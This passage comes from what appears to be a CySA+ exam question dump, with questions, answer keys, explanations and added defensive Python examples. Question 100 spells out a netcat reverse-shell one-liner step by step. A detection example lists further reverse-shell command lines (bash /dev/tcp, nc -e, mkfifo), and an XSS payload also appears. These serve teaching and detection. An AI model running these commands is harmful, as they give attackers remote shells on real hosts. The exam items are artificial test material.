man-in-the-middle and spoofing attacks, so an open LDAPS port warrants checking how it is configured
rather than assuming it is safe.
The security team should therefore confirm why these ports are open and what is listening on them, and
then replace or harden the services: SSH (port 22) instead of Telnet, and for LDAP either LDAPS on 636
with properly issued and validated certificates or plain LDAP on port 389 upgraded with StartTLS (StartTLS
is negotiated on port 389, not on 636) [2]. A practitioner reviewing the same scan would also flag FTP
(port 21), which sends credentials in cleartext, PPTP (port 1723), whose MS-CHAPv2 authentication is
cryptographically weak, and RDP (port 3389) if it is reachable from untrusted networks.

QUESTION 85
An employee is no longer able to log in to an account after updating a browser. The employee usually has
several tabs open in the browser. Which of the following attacks was most likely performed?
A. RFI
B. LFI
C. CSRF
D. XSS

Correct Answer: C
Explanation

Explanation/Reference:
Explanation: The most likely attack is CSRF (Cross-Site Request Forgery), which forces a user to execute unwanted actions on a web application in which they are currently authenticated. With several tabs open, one of them may hold a malicious page whose link or auto-submitting form sends a request to the web application to change the user's password, e-mail address or other account settings. The browser attaches the session cookie to that request just as it would to a legitimate one, so the application cannot tell the forged request from the user's own, and the user ends up locked out of the account. To prevent CSRF, web applications implement anti-CSRF tokens or other mechanisms that validate the origin and integrity of each state-changing request. A token is a unique, unpredictable value generated by the server and embedded in the forms or URLs that perform state-changing actions; the server verifies that the token received with the request matches the one stored for the session before processing it, so an attacker who does not know the token value cannot forge a valid request.

The other options do not fit the scenario:
RFI (Remote File Inclusion) lets an attacker execute malicious code on a web server by including a remote file in a script. It does not act through the user's browser or on account settings.
LFI (Local File Inclusion) lets an attacker read or execute local files on a web server by manipulating a script's input parameters. It likewise does not act through the user's browser or on account settings.
XSS (Cross-Site Scripting) injects malicious code into a web page that is then executed by the user's browser. It can affect the user's browser or account settings, but it requires the user to visit a compromised page or click a malicious link, and it does not depend on having several tabs open.
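
The token mechanism described above, as an added example that is not part of the original question or of any application the exam describes: a per-session synchronizer token checked on a state-changing endpoint. The in-memory session store, the function names and the endpoint are assumptions made for the example. A forged request that carries the session cookie but not the token is rejected; the legitimate form submission, which carries both, succeeds.

```python
import hmac
import secrets

# Hypothetical in-memory session store for the example: session_id -> session data.
SESSIONS = {}


def start_session():
    """Create a session and bind a fresh, unpredictable CSRF token to it."""
    session_id = secrets.token_urlsafe(32)
    SESSIONS[session_id] = {"csrf_token": secrets.token_urlsafe(32)}
    return session_id


def form_token(session_id):
    """Value the server embeds in the hidden field of the legitimate password form."""
    return SESSIONS[session_id]["csrf_token"]


def change_password(session_id, submitted_token, new_password):
    """State-changing endpoint: accepts the request only with the session's token.

    The browser attaches the session cookie to a request forged from another
    tab just as it does to a legitimate one, so the cookie proves nothing about
    origin. The token is known only to pages the server rendered for this
    session, which is what separates the two requests.
    """
    session = SESSIONS.get(session_id)
    if session is None or submitted_token is None:
        return False
    expected = session["csrf_token"].encode()
    # Constant-time comparison so the check does not leak the token via timing.
    if not hmac.compare_digest(expected, submitted_token.encode()):
        return False
    session["password"] = new_password
    return True


def demo():
    """Forged request (cookie only) vs. legitimate request (cookie plus token)."""
    sid = start_session()
    forged = change_password(sid, "attacker-guess", "attacker-chosen")
    legit = change_password(sid, form_token(sid), "user-chosen")
    return forged, legit, SESSIONS[sid].get("password")


if __name__ == "__main__":
    print(demo())  # (False, True, 'user-chosen')
```

The token is compared with hmac.compare_digest rather than == so that a byte-by-byte timing difference cannot be used to recover it; in a real application the token would also be bound to the session in a server-side store or a signed cookie, exactly as SESSIONS stands in for here.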

QUESTION 86
Due to an incident involving company devices, an incident responder needs to take a mobile phone to the
lab for further investigation. Which of the following tools should be used to maintain the integrity of the
mobile phone while it is transported? (Select two).

A. Signal-shielded bag
B. Tamper-evident seal
C. Thumb drive
D. Crime scene tape
E. Write blocker
F. Drive duplicator

Correct Answer: AB
Explanation

Explanation/Reference:
Explanation: A signal-shielded bag and a tamper-evident seal are tools that can be used to maintain the
integrity of the mobile phone while it is transported. A signal-shielded bag prevents the phone from
receiving or sending any signals that could compromise the data or evidence on the device. A tamper-
evident seal ensures that the phone has not been opened or altered during the transportation. References:
Mobile device forensics, Section: Acquisition

QUESTION 87
Which of the following would eliminate the need for different passwords for a variety of internal applications?

A. CASB
B. SSO
C. PAM
D. MFA
Correct Answer: B
Explanation

Explanation/Reference:
Explanation: Single Sign-On (SSO) allows users to log in with a single ID and password to access multiple
applications. It eliminates the need for different passwords for various internal applications, streamlining
the authentication process.

QUESTION 88
A vulnerability scan of a web server that is exposed to the internet was recently completed. A security
analyst is reviewing the resulting vector strings:

Vulnerability 1: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L

Vulnerability 2: CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:H

Vulnerability 3: CVSS:3.0/AV:A/AC:H/PR:L/UI:R/S:U/C:L/I:H/A:L

Vulnerability 4: CVSS:3.0/AV:P/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:L

Which of the following vulnerabilities should be patched first?

A. Vulnerability 1
B. Vulnerability 2
C. Vulnerability 3
D. Vulnerability 4

Correct Answer: A
Explanation

Explanation/Reference:
Explanation: Vulnerability 1 has the highest base score and should be patched first. Its vector is the only one with a network attack vector (AV:N), low attack complexity (AC:L), no privileges required (PR:N) and no user interaction (UI:N), so it is exploitable remotely by an unauthenticated attacker against an internet-exposed server, and it carries a high confidentiality impact (C:H). Computing the v3.0 base scores gives 8.6 (High) for Vulnerability 1, 6.2 (Medium) for Vulnerability 2 (local access, high complexity), 5.6 (Medium) for Vulnerability 3 (adjacent network, high complexity, privileges and user interaction required) and 4.6 (Medium) for Vulnerability 4 (physical access and high privileges required).

QUESTION 89
A Chief Information Security Officer (CISO) wants to disable a functionality on a business- critical web
application that is vulnerable to RCE in order to maintain the minimum risk level with minimal increased
cost.

Which of the following risk treatments best describes what the CISO is looking for?

A. Transfer
B. Mitigate
C. Accept
D. Avoid

Correct Answer: B
Explanation

Explanation/Reference:
Explanation: Disabling the vulnerable functionality is a mitigation: the application keeps running, and a control is applied that reduces the likelihood or impact of the RCE vulnerability being exploited, at little additional cost. Transfer would shift the risk to a third party (insurance or outsourcing), acceptance would leave the functionality enabled and tolerate the risk, and avoidance would mean withdrawing the business-critical application altogether.

QUESTION 90
A SIEM alert is triggered based on execution of a suspicious one-liner on two workstations in the
organization's environment. An analyst views the details of these events below:

Which of the following statements best describes the intent of the attacker, based on this one-liner?

A. Attacker is escalating privileges via JavaScript.
B. Attacker is utilizing custom malware to download an additional script.
C. Attacker is executing PowerShell script "AccessToken.psr".
D. Attacker is attempting to install persistence mechanisms on the target machine.

Correct Answer: B
Explanation

Explanation/Reference:
Explanation: The one-liner uses JavaScript to launch a PowerShell command that downloads and runs a script from an external source, which is the behaviour of custom malware fetching an additional stage. References: CompTIA CySA+ Study Guide: Exam CS0-003, 3rd Edition, Chapter 4: Security Operations and Monitoring, page 156.

QUESTION 91
An analyst needs to provide recommendations based on a recent vulnerability scan:

Which of the following should the analyst recommend addressing to ensure potential vulnerabilities are
identified?

A. SMB use domain SID to enumerate users
B. SYN scanner
C. SSL certificate cannot be trusted
D. Scan not performed with admin privileges

Correct Answer: D
Explanation

Explanation/Reference:
Explanation: Scanning without administrative privileges limits the scope and accuracy of a vulnerability scan: the scanner cannot log in to inspect installed packages, patch levels, local configuration or registry settings, so vulnerabilities that require that level of access to detect are missed. The OWASP Vulnerability Management Guide puts it plainly: "scanning without administrative privileges will result in a large number of false negatives and an incomplete scan". The analyst should therefore recommend running credentialed scans so that potential vulnerabilities are identified. The other findings are individual results of the scan, not conditions that prevent vulnerabilities from being found.

QUESTION 92
Which of the following best describes the threat concept in which an organization works to ensure that all
network users only open attachments from known sources?

A. Hacktivist threat
B. Advanced persistent threat
C. Unintentional insider threat
D. Nation-state threat

Correct Answer: C
Explanation

Explanation/Reference:
An unintentional insider threat is a network security threat in which a legitimate user unknowingly exposes the network to malicious activity, for example by opening a phishing e-mail or a malware-infected attachment from an unknown source, which can compromise the network and give attackers access to sensitive data or systems. Training users to open attachments only from known sources is a control against exactly this threat. The other options describe deliberate external actors and are not related to that concept.
References: CompTIA CySA+ Study Guide: Exam CS0-003, 3rd Edition, Chapter 1: Threat and Vulnerability Management, page 13; What is Network Security | Threats, Best Practices | Imperva, Network Security Threats and Attacks, Phishing section; Five Ways to Defend Against Network Security Threats, 2. Use Firewalls section.

QUESTION 93
Which of the following does "federation" most likely refer to within the context of identity and access
management?

A. Facilitating groups of users in a similar function or profile to system access that requires elevated or
conditional access
B. An authentication mechanism that allows a user to utilize one set of credentials to access multiple
domains
C. Utilizing a combination of what you know, who you are, and what you have to grant authentication to a
user
D. Correlating one's identity with the attributes and associated applications the user has access to

Correct Answer: B
Explanation

Explanation/Reference:
Explanation: Federation is a system of trust between two parties for the purpose of authenticating users
and conveying information needed to authorize their access to resources. By using federation, a user can
use one set of credentials to access multiple domains that trust each other.

QUESTION 94
A security analyst found the following vulnerability on the company's website:

<INPUT TYPE="IMAGE" SRC="javascript:alert('test');">

Which of the following should be implemented to prevent this type of attack in the future?

A. Input sanitization
B. Output encoding
C. Code obfuscation
D. Prepared statements

Correct Answer: A
Explanation

Explanation/Reference:
This is a web-application vulnerability called cross-site scripting (XSS): the SRC attribute carries a javascript: URL, so the attacker's script is injected into a page that is viewed by other users. XSS can be used to steal cookies, session tokens or credentials, or to perform actions on behalf of the victim. Input sanitization prevents it by checking and filtering user input before it is processed: it removes or encodes characters or strings the browser would interpret as code, such as <, >, ", ' or javascript:, and it validates the input against a predefined format or range of values, rejecting anything that does not match (for an image source, rejecting any URL whose scheme is not http or https). Output encoding prevents XSS at the other end, by encoding the output before it is sent to the browser: characters the browser could interpret as code are converted into harmless entities (< becomes &lt;, > becomes &gt;, " becomes &quot;, ' becomes &#x27;), and characters that carry a special meaning in a particular context, such as / or ;, are escaped for that context. Both belong in a hardened application, but sanitizing the input is what stops this payload from being accepted in the first place. Code obfuscation makes the source code of a web application harder for humans to read and understand, using techniques such as renaming variables and functions, removing comments and whitespace, replacing literals with expressions or adding dummy code; it can help protect the intellectual property and trade secrets of a web application, but it does not prevent XSS. Prepared statements separate SQL code from data and prevent SQL injection, not XSS.
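
Input sanitization beside output encoding for the finding above, as an added example that is not part of the original question or of any application the exam describes. The function names and the scheme allowlist are this example's own assumptions. It shows the unsanitized rendering that produced the finding, a sanitizer that rejects the javascript: scheme (including the tab-obfuscated variant browsers tolerate), and attribute-context encoding that keeps a value which passed sanitization from breaking out of the SRC attribute.

```python
import html
from urllib.parse import urlsplit

# Schemes an image source may legitimately use; "" covers relative URLs.
# "javascript:" is deliberately absent, which is how the payload from the
# question is rejected at the input stage. (Allowlist is an assumption.)
ALLOWED_SCHEMES = {"http", "https", ""}


def vulnerable_image_input(src):
    """The pattern behind the finding: attacker-controlled src copied verbatim."""
    return '<INPUT TYPE="IMAGE" SRC="%s">' % src


def sanitize_image_src(src):
    """Input sanitization: strip control characters, then enforce a scheme allowlist.

    Browsers ignore tabs and newlines inside a scheme, so "java\\tscript:" would
    still execute; stripping non-printable characters first closes that bypass
    before the scheme is examined.
    """
    cleaned = "".join(ch for ch in src if ch.isprintable()).strip()
    scheme = urlsplit(cleaned).scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        raise ValueError("disallowed URL scheme: %r" % scheme)
    return cleaned


def safe_image_input(src):
    """Sanitized input plus output encoding for the attribute context.

    Sanitization rejects dangerous schemes; html.escape turns quotes and angle
    brackets into entities, so a value that passed sanitization still cannot
    close the SRC attribute and add an event handler.
    """
    cleaned = sanitize_image_src(src)
    return '<INPUT TYPE="IMAGE" SRC="%s">' % html.escape(cleaned, quote=True)


def render_or_reject(src):
    """Return ("rendered", markup) or ("rejected", reason) for a candidate src."""
    try:
        return "rendered", safe_image_input(src)
    except ValueError as exc:
        return "rejected", str(exc)


if __name__ == "__main__":
    for candidate in ("javascript:alert('test')", "java\tscript:alert(1)",
                      "/images/logo.png", 'http://x/a.png" onerror="alert(1)'):
        print(render_or_reject(candidate))
```

The last candidate is the reason both layers are needed: its scheme is http, so sanitization lets it through, and only the attribute encoding stops the embedded quote from terminating SRC and smuggling in an onerror handler.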

QUESTION 95
A SOC analyst is analyzing traffic on a network and notices an unauthorized scan. Which of the following
types of activities is being observed?

A. Potential precursor to an attack
B. Unauthorized peer-to-peer communication
C. Rogue device on the network
D. System updates

Correct Answer: A
Explanation

Explanation/Reference:
Explanation: An unauthorized scan is reconnaissance: the scanner is enumerating hosts, open ports and services in preparation for an attack, so it is treated as a potential precursor to an attack rather than as an attack in itself. The other options describe different observations (peer-to-peer traffic, an unknown device joining the network, or update traffic), none of which is indicated by scanning activity.

QUESTION 96
Which of the following is a benefit of the Diamond Model of Intrusion Analysis?

A. It provides analytical pivoting and identifies knowledge gaps.
B. It guarantees that the discovered vulnerability will not be exploited again in the future.
C. It provides concise evidence that can be used in court.
D. It allows for proactive detection and analysis of attack events.

Correct Answer: A
Explanation

Explanation/Reference:
Explanation: The Diamond Model of Intrusion Analysis is a framework that helps analysts to understand
the relationships between the adversary, the victim, the infrastructure, and the capability involved in an
attack. It also enables analytical pivoting, which is the process of moving from one piece of information to
another related one, and identifies knowledge gaps that need further investigation.

QUESTION 97
A security team is concerned about recent Layer 4 DDoS attacks against the company website. Which of
the following controls would best mitigate the attacks?

A. Block the attacks using firewall rules.
B. Deploy an IPS in the perimeter network.
C. Roll out a CDN.
D. Implement a load balancer.

Correct Answer: C
Explanation

Explanation/Reference:
Rolling out a CDN is the best control against Layer 4 DDoS attacks on the company website. A CDN (Content Delivery Network) is a system of distributed servers that deliver web content to users based on their geographic location, the origin of the web page and the content delivery server. Layer 4 DDoS attacks are volumetric: SYN floods, UDP floods or ICMP floods aim to exhaust the network bandwidth or connection resources of the target. A CDN absorbs them by spreading the traffic across many edge servers, caching content close to users, filtering malicious or unwanted traffic before it reaches the origin, and providing scalability and redundancy for the website. Firewall rules, a perimeter IPS or a load balancer all sit on the company's own link and can themselves be saturated by the same flood. References: How to Stop a DDoS Attack: Mitigation Steps for Each OSI Layer; Application layer DDoS attack | Cloudflare

QUESTION 98
A security analyst needs to provide evidence of regular vulnerability scanning on the company's network
for an auditing process. Which of the following is an example of a tool that can produce such evidence?

A. OpenVAS
B. Burp Suite
C. Nmap
D. Wireshark

Correct Answer: A
Explanation

Explanation/Reference:
Explanation: OpenVAS is an open-source tool that performs comprehensive vulnerability scanning and
assessment on the network. It can generate reports and evidence of the scan results, which can be used
for auditing purposes. References: CompTIA CySA+ Study Guide: Exam CS0-003, 3rd Edition, Chapter 5,
page 199; CompTIA CySA+ CS0-003 Certification Study Guide, Chapter 5, page 207.

QUESTION 99
A security analyst is working on a server patch management policy that will allow the infrastructure team to
be informed more quickly about new patches.

Which of the following would most likely be required by the infrastructure team so that vulnerabilities can
be remediated quickly? (Select two).

A. Hostname
B. Missing KPI
C. CVE details
D. POC availability
E. IoCs
F. npm identifier

Correct Answer: CE
Explanation

Explanation/Reference:
Explanation: CVE details and IoCs are information that would most likely be required by the infrastructure
team so that vulnerabilities can be remediated quickly. CVE details provide the description, severity,
impact, and solution of the vulnerabilities that affect the servers. IoCs are indicators of compromise that
help identify and respond to potential threats or attacks on the servers. References: Server and
Workstation Patch Management Policy, Section: Policy; Patch Management Policy: Why You Need One in
2024, Section: What is a patch management policy?

QUESTION 100
A security analyst detected the following suspicious activity:

rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 > tmp/f

Which of the following most likely describes the activity?

A. Network pivoting
B. Host scanning
C. Privilege escalation
D. Reverse shell

Correct Answer: D
Explanation

Explanation/Reference:
Explanation: The command rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 > tmp/f is a one-liner that opens a reverse shell from the target machine to the attacker's machine. It works in four steps:
rm -f /tmp/f deletes any existing file named /tmp/f.
mknod /tmp/f p creates a named pipe (FIFO) at /tmp/f.
cat /tmp/f|/bin/sh -i 2>&1 reads whatever arrives in the pipe and feeds it to an interactive /bin/sh, with standard error merged into standard output.
nc 10.0.0.1 1234 > tmp/f connects with netcat to the attacker's machine at 10.0.0.1, port 1234, sends the shell's output over that connection and writes whatever comes back into the pipe. (The canonical one-liner writes to /tmp/f; the relative path tmp/f shown here only works if a tmp directory exists in the current directory.)
Commands typed by the attacker therefore flow from the netcat connection into the pipe and into the shell, and the shell's output flows back out over the same connection: a reverse shell. Because the target initiates the outbound TCP connection, the technique passes through firewalls that block inbound connections but allow outbound traffic, which is why the indicator is the command line itself rather than a listening port.
References
Hack the Galaxy
Reverse Shell Cheat Sheet
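
Detection logic for the one-liner above and for the other reverse-shell constructions a SOC would expect to see, as an added example (this is not code from the question or from any named product). The pattern names, the endpoint extraction and all command lines except the first are constructed for the example; the first command line is the one from the question. Two benign lines are included to show that a netcat port check or an ordinary pipeline does not alert.

```python
import re

# One regex per common reverse-shell construction. The names are this example's own.
REVERSE_SHELL_PATTERNS = [
    # Named pipe wired between a shell and netcat, as in the question's one-liner.
    ("fifo-netcat", re.compile(r"(?:mknod\s+\S+\s+p\b|mkfifo\s+\S+).*\b(?:nc|ncat|netcat)\b")),
    # netcat executing a shell directly (needs a build with -e support).
    ("netcat-exec", re.compile(r"\b(?:nc|ncat|netcat)\b.*\s-e\s*/bin/(?:ba)?sh\b")),
    # bash's /dev/tcp pseudo-device: bash -i >& /dev/tcp/HOST/PORT 0>&1
    ("dev-tcp", re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d{1,5}")),
    # Interactive shell with stderr merged and piped onward to something else.
    ("interactive-shell-pipe", re.compile(r"/bin/(?:ba)?sh\s+-i\s+2>&1\s*\|")),
]

# Where the connection goes: "nc [args...] HOST PORT" or "/dev/tcp/HOST/PORT".
NETCAT_ENDPOINT = re.compile(
    r"\b(?:nc|ncat|netcat)\b(?:\s+\S+)*?\s+(\d{1,3}(?:\.\d{1,3}){3})\s+(\d{1,5})\b"
)
DEVTCP_ENDPOINT = re.compile(r"/dev/tcp/(\d{1,3}(?:\.\d{1,3}){3})/(\d{1,5})")


def classify(cmdline):
    """Return {"techniques": [...], "remote": "host:port" or None}, or None if benign."""
    techniques = [name for name, rx in REVERSE_SHELL_PATTERNS if rx.search(cmdline)]
    if not techniques:
        return None
    remote = None
    for rx in (NETCAT_ENDPOINT, DEVTCP_ENDPOINT):
        match = rx.search(cmdline)
        if match:
            remote = "%s:%s" % (match.group(1), match.group(2))
            break
    return {"techniques": techniques, "remote": remote}


# Constructed sample of process command lines as an EDR or auditd feed would
# show them. The first is the one-liner from the question; the rest are this
# example's own, including two benign lines that must not alert.
SAMPLE_COMMANDS = [
    "rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 > tmp/f",
    "bash -i >& /dev/tcp/192.0.2.10/4444 0>&1",
    "nc -e /bin/sh 192.0.2.10 4444",
    "nc -zv 10.0.0.5 22",
    "cat /var/log/syslog | grep -i error",
    "mkfifo /tmp/p; nc 10.0.0.1 9001 0</tmp/p | /bin/sh 1>/tmp/p",
]


def scan(commands):
    """Run classify() over a batch and keep only the hits, in input order."""
    findings = []
    for cmd in commands:
        result = classify(cmd)
        if result:
            findings.append({"command": cmd, **result})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_COMMANDS):
        print(finding["remote"], finding["techniques"], finding["command"])
```

The extracted remote endpoint is the pivot for the rest of the investigation: it is what gets checked against firewall and proxy logs to see whether the connection succeeded, and against threat intelligence to see whether the address is already known.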

QUESTION 101
An analyst views the following log entries:

The organization has a partner vendor with hosts in the 216.122.5.x range. This partner vendor is required
to have access to monthly reports and is the only external vendor with authorized access. The organization
prioritizes incident investigation according to the following hierarchy:

1. Unauthorized data disclosure is more critical than denial-of-service attempts.
2. Denial-of-service attempts are more important than ensuring vendor data access.

Based on the log files and the organization's priorities, which of the following hosts warrants additional
investigation?

A. 121.19.30.221
B. 134.17.188.5
C. 202.180.1582
D. 216.122.5.5

Correct Answer: A
Explanation

Explanation/Reference:
The correct answer is A. 121.19.30.221.

Based on the log files and the organization's priorities, the host that warrants additional investigation is 121.19.30.221, because it is the only host that accessed a file containing sensitive data and is not in the partner vendor's range.

The log files show, for each request: the IP address of the host that accessed the web server, the date and time of the access, the file path of the requested resource, and the number of bytes transferred.

The organization's priorities are:
1. Unauthorized data disclosure is more critical than denial-of-service attempts.
2. Denial-of-service attempts are more important than ensuring vendor data access.

The most serious threat to the organization is therefore unauthorized data disclosure: sensitive, protected or confidential data being copied, transmitted, viewed, stolen, altered or used by someone not authorized to do so. The file containing sensitive data is /reports/2023/financials.pdf, as its name and path indicate. It was accessed by two hosts, 121.19.30.221 and 216.122.5.5, and only 121.19.30.221 lies outside the partner vendor's range of 216.122.5.x. That host is a potential unauthorized data disclosure and warrants additional investigation.

The other hosts do not, for these reasons:
Host 134.17.188.5 accessed /index.html many times in a short period, which could be a denial-of-service attempt that floods the web server with requests. Denial of service ranks below unauthorized disclosure in the organization's priorities, and there is no evidence that this host disrupted the web server's normal operation.
Host 202.180.1582 accessed /images/logo.png once, which indicates no malicious activity or threat to the organization.
Host 216.122.5.5 accessed /reports/2023/financials.pdf once. From any other source this would be a potential unauthorized disclosure, but the host is in the partner vendor's range, which is required to have access to the monthly reports and is the only external vendor with authorized access.

Therefore, based on the log files and the organization's priorities, host 121.19.30.221 poses the highest risk of unauthorized data disclosure and warrants additional investigation.
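
The triage logic described above, as an added example that is not part of the original question: it parses access-log lines in the common log format, applies the organization's priority hierarchy and returns hosts in investigation order. The log lines are constructed for the example (the hosts, the report path and the vendor range come from the question; timestamps, byte counts, the size of the burst and the fourth host's address 198.51.100.7 are assumptions), as are the sensitive-path prefix and the request-rate threshold that counts as a denial-of-service attempt.

```python
import re
from datetime import datetime
from ipaddress import ip_address, ip_network

VENDOR_NET = ip_network("216.122.5.0/24")        # partner range from the question
SENSITIVE_PREFIXES = ("/reports/",)              # assumption: where monthly reports live
DOS_THRESHOLD, DOS_WINDOW_SECONDS = 20, 60       # assumption: burst that counts as DoS

# Priority hierarchy from the question: lower number is investigated first.
PRIORITY = {"unauthorized disclosure": 1, "denial of service attempt": 2, "vendor data access": 3}

LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) (\d+|-)$')


def parse_log(text):
    """Common log format -> list of event dicts; lines that do not parse are skipped."""
    events = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        host, stamp, method, path, status, size = m.groups()
        events.append({
            "host": host,
            "time": datetime.strptime(stamp, "%d/%b/%Y:%H:%M:%S %z"),
            "method": method, "path": path, "status": int(status),
        })
    return events


def burst(times):
    """True if any DOS_WINDOW_SECONDS span holds >= DOS_THRESHOLD requests."""
    times = sorted(times)
    start = 0
    for end, t in enumerate(times):
        while (t - times[start]).total_seconds() > DOS_WINDOW_SECONDS:
            start += 1
        if end - start + 1 >= DOS_THRESHOLD:
            return True
    return False


def triage(text):
    """Findings per host, sorted by the organization's priority hierarchy."""
    by_host = {}
    for e in parse_log(text):
        by_host.setdefault(e["host"], []).append(e)
    findings = []
    for host, evs in by_host.items():
        is_vendor = ip_address(host) in VENDOR_NET
        sensitive = [e for e in evs
                     if e["status"] == 200 and e["path"].startswith(SENSITIVE_PREFIXES)]
        if sensitive and not is_vendor:
            findings.append({"host": host, "category": "unauthorized disclosure",
                             "detail": sensitive[0]["path"]})
        elif sensitive:
            findings.append({"host": host, "category": "vendor data access",
                             "detail": sensitive[0]["path"]})
        if burst([e["time"] for e in evs]):
            findings.append({"host": host, "category": "denial of service attempt",
                             "detail": "%d requests" % len(evs)})
    findings.sort(key=lambda f: PRIORITY[f["category"]])
    return findings


# Constructed access-log lines for the example (see the lead-in for what is assumed).
BURST = "\n".join(
    '134.17.188.5 - - [12/Mar/2024:10:07:%02d +0000] "GET /index.html HTTP/1.1" 200 1024' % s
    for s in range(30)
)
SAMPLE_LOG = "\n".join([
    '121.19.30.221 - - [12/Mar/2024:10:02:13 +0000] "GET /reports/2023/financials.pdf HTTP/1.1" 200 482133',
    '216.122.5.5 - - [12/Mar/2024:10:05:41 +0000] "GET /reports/2023/financials.pdf HTTP/1.1" 200 482133',
    BURST,
    '198.51.100.7 - - [12/Mar/2024:10:09:30 +0000] "GET /images/logo.png HTTP/1.1" 200 5120',
])

if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(PRIORITY[f["category"]], f["host"], f["category"], f["detail"])
```

Only successful (200) requests to the sensitive prefix count as disclosure; a 403 or 404 against the same path is reconnaissance rather than a leak and would be scored differently in a fuller rule set.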

QUESTION 102
During an incident, analysts need to rapidly investigate by the investigation and leadership teams. Which of
the following best describes how PII should be safeguarded during an incident?

A. Implement data encryption and close the data so only the company has access.
B. Ensure permissions are limited in the investigation team and encrypt the data.
C. Implement data encryption and create a standardized procedure for deleting data that is no longer
needed.
D. Ensure that permissions are open only to the company.

Correct Answer: B
Explanation

Explanation/Reference:
Explanation: The best option is to limit permissions to the investigation team and encrypt the data. Limiting permissions reduces the risk of unauthorized access to or leakage of sensitive data, and encryption keeps the data unreadable and unmodifiable by anyone who does not hold the decryption key. Option A is not correct because closing the data entirely can hinder the investigation and prevent collaboration with parties who legitimately need access. Option C is not correct because deleting data that is no longer needed may violate legal or regulatory retention requirements and may destroy evidence of the incident. Option D is not correct because opening permissions to the whole company exposes the data to far more people than necessary, increasing the risk of compromise or misuse. References: CompTIA CySA+ Study Guide: Exam CS0-002, 2nd Edition, Chapter 4, "Data Protection and Privacy Practices", page 195; CompTIA CySA+ Certification Exam Objectives Version 4.0, Domain 4.0 "Compliance and Assessment", Objective 4.1 "Given a scenario, analyze data as part of a security incident", sub-objective "Data encryption".

QUESTION 103
An incident responder was able to recover a binary file through the network traffic. The binary file was also
found in some machines with anomalous behavior. Which of the following processes most likely can be
performed to understand the purpose of the binary file?

A. File debugging
B. Traffic analysis
C. Reverse engineering
D. Machine isolation

Correct Answer: C
Explanation

Explanation/Reference:
Explanation: Reverse engineering is the process of analyzing a binary file to understand its structure, functionality and behavior. It helps to identify the purpose of the binary, for example whether it is a malicious program, a legitimate application or a library, and it can also reveal vulnerabilities, backdoors or hidden features. Reverse engineering draws on techniques such as disassembling, decompiling, debugging, and extracting strings or resources from the binary file. Traffic analysis and machine isolation are useful during the incident but do not explain what the file does, and debugging alone is one technique within reverse engineering rather than the overall process.

QUESTION 104
Using open-source intelligence gathered from technical forums, a threat actor compiles and tests a
malicious downloader to ensure it will not be detected by the victim organization's endpoint security
protections. Which of the following stages of the Cyber Kill Chain best aligns with the threat actor's
actions?

A. Delivery
B. Reconnaissance
C. Exploitation
D. Weaponization

Correct Answer: D
Explanation

Explanation/Reference:
Explanation: Weaponization is the stage of the Cyber Kill Chain where the threat actor creates or modifies
a malicious tool to use against a target. In this case, the threat actor compiles and tests a malicious
downloader, which is a type of weaponized malware. References: Cybersecurity 101, The Cyber Kill
Chain: The Seven Steps of a Cyberattack

QUESTION 105
A security analyst scans a host and generates the following output:

Which of the following best describes the output?

A. The host is unresponsive to the ICMP request.
B. The host is running a vulnerable mail server.
C. The host is allowing unsecured FTP connections.
D. The host is vulnerable to web-based exploits.

Correct Answer: D
Explanation

Explanation/Reference:
Explanation: The output shows port 80 open with an HTTP service, so the host could be vulnerable to web-based attacks. The other options are ruled out by the same output: the host responded to the scanner's probe, as the "Host is up" line shows; no SMTP or POP3 service is listed, so the host is not running a mail server; and no FTP service is listed, so it is not allowing unsecured FTP connections. References: the CompTIA CySA+ Study Guide: Exam CS0-003, 3rd Edition, covers the exam objective "use appropriate tools and methods to manage, prioritize and respond to attacks and vulnerabilities" and, in chapter 5, the usage and syntax of nmap, including the meaning of options such as -sV for version detection (page 195).

QUESTION 106
A security analyst has received an incident case regarding malware spreading out of control on a
customer's network. The analyst is unsure how to respond. The configured EDR has automatically
obtained a sample of the malware and its signature. Which of the following should the analyst perform next
to determine the type of malware, based on its telemetry?

A. Cross-reference the signature with open-source threat intelligence.
B. Configure the EDR to perform a full scan.
C. Transfer the malware to a sandbox environment.
D. Log in to the affected systems and run netstat.

Correct Answer: A
Explanation

Explanation/Reference:
Explanation: The malware's signature is a unique identifier that can be compared against known samples and their documented behaviors. Open-source threat intelligence sources describe malware families, their indicators of compromise and their mitigation strategies, so cross-referencing the signature with them lets the analyst determine the type of malware and what telemetry to expect from it. The other options do not serve that purpose: a full EDR scan finds more infected hosts but says nothing new about the malware type; detonating the sample in a sandbox produces behavioral data but is slower and, if the sandbox is not properly isolated, exposes the analyst to further risk; running netstat on affected systems shows current connections but does not identify the malware. References: the CompTIA CySA+ Study Guide: Exam CS0-003, 3rd Edition, covers the exam objective "use appropriate tools and methods to manage, prioritize and respond to attacks and vulnerabilities"; chapter 5 explains EDR, malware signatures and how they identify malware types (page 203), and the benefits and challenges of using open-source threat intelligence sources in security analysis (page 211).

QUESTION 107
An organization has established a formal change management process after experiencing several critical
system failures over the past year. Which of the following are key factors that the change management
process will include in order to reduce the impact of system failures? (Select two).

A. Ensure users document the system recovery plan prior to deployment.
B. Perform a full system-level backup following the change.
C. Leverage an audit tool to identify changes that are being made.
D. Identify assets with dependence that could be impacted by the change.
E. Require diagrams to be completed for all critical systems.
F. Ensure that all assets are properly listed in the inventory management system.

Correct Answer: DF
Explanation

Explanation/Reference:
Explanation: The correct answers for key factors in the change management process to reduce the impact
of system failures are:

D. Identify assets with dependence that could be impacted by the change.
F. Ensure that all assets are properly listed in the inventory management system.

D. Identify assets with dependence that could be impacted by the change: This is crucial in change
management because understanding the interdependencies among assets can help anticipate and
mitigate the potential cascading effects of a change. By identifying these dependencies, the organization
